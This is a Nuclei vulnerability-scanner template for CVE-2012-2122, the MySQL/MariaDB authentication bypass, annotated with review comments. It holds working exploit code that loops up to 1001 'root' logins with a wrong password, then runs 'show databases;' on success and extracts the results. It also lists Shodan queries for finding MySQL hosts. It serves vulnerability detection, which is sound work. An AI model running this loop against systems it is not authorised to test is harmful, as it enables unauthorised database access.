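# Nuclei template for CVE-2012-2122 (MySQL/MariaDB authentication bypass).
# NOTE(review): the trailing "# digest:" line is a signature over the original
# template body; it no longer matches after any edit (including this one) and
# has to be regenerated before the template is used in signed mode.
id: CVE-2012-2122

info:
  name: MySQL - Authentication Bypass
  author: pussycat0x
  severity: medium
  description: |
    sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
    - http://kb.askmonty.org/en/mariadb-5162-release-notes/
    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
    - http://security.gentoo.org/glsa/glsa-201308-06.xml
    - http://securitytracker.com/id?1027143
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P
    cvss-score: 5.1
    cve-id: CVE-2012-2122
    cwe-id: CWE-287
    epss-score: 0.9681
    epss-percentile: 0.99685
    cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:*
  metadata:
    verified: true
    # Upper bound of the retry loop in the code block below: each iteration is
    # one full connect/authenticate/query round trip, so a single run can
    # generate up to 1001 login attempts against the target (the previous
    # value of 1 understated this).
    max-request: 1001
    vendor: oracle
    product: mysql
    shodan-query:
      - "product:\"MySQL\""
      - product:"mysql"
  # "mssql" was a typo: this template targets MySQL/MariaDB, matching the
  # cpe, product and vendor fields above.
  tags: cve,cve2012,js,enum,network,mysql,fuzz,oracle

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);

    code: |
      const mysql = require('nuclei/mysql');
      const client = new mysql.MySQLClient();
      // The flaw (see description) only manifests after repeated logins with the
      // same incorrect password, so the check is a bounded retry loop rather than
      // a single attempt. A rejected login is the expected outcome on a patched
      // server, which is why the catch below is a deliberate best-effort skip;
      // the loop exits on the first attempt that succeeds despite the wrong
      // password. From the server side, this run looks like a burst of failed
      // "root" logins from one source on the MySQL port.
      for (let i = 1; i <= 1001; i++) {
        try {
          const connected = client.ExecuteQuery(Host, Port, User, Pass, Query);
          Export(connected);
          break;
        } catch {
          // error
        }
      }

    args:
      Host: "{{Host}}"
      Port: 3306
      User: "root"
      # Intentionally incorrect password: the matcher only fires if a query
      # succeeds despite it.
      Pass: "wrong"
      Query: "show databases;"

    matchers:
      - type: dsl
        dsl:
          - "success == true"

    extractors:
      - type: json
        part: response
        json:
          - .Rows[] | .Database
# digest: 4a0a0047304502207fa11d2a7dbb88837eb0ae592716b8a335a68e751bf3d72680406af18e40e484022100ba836bfec0daf4f5dd1cdfa594c59a8f139e7289c66b9bf49bc0e529a6a9b903:922c64590222798bb761d5b6d8e72950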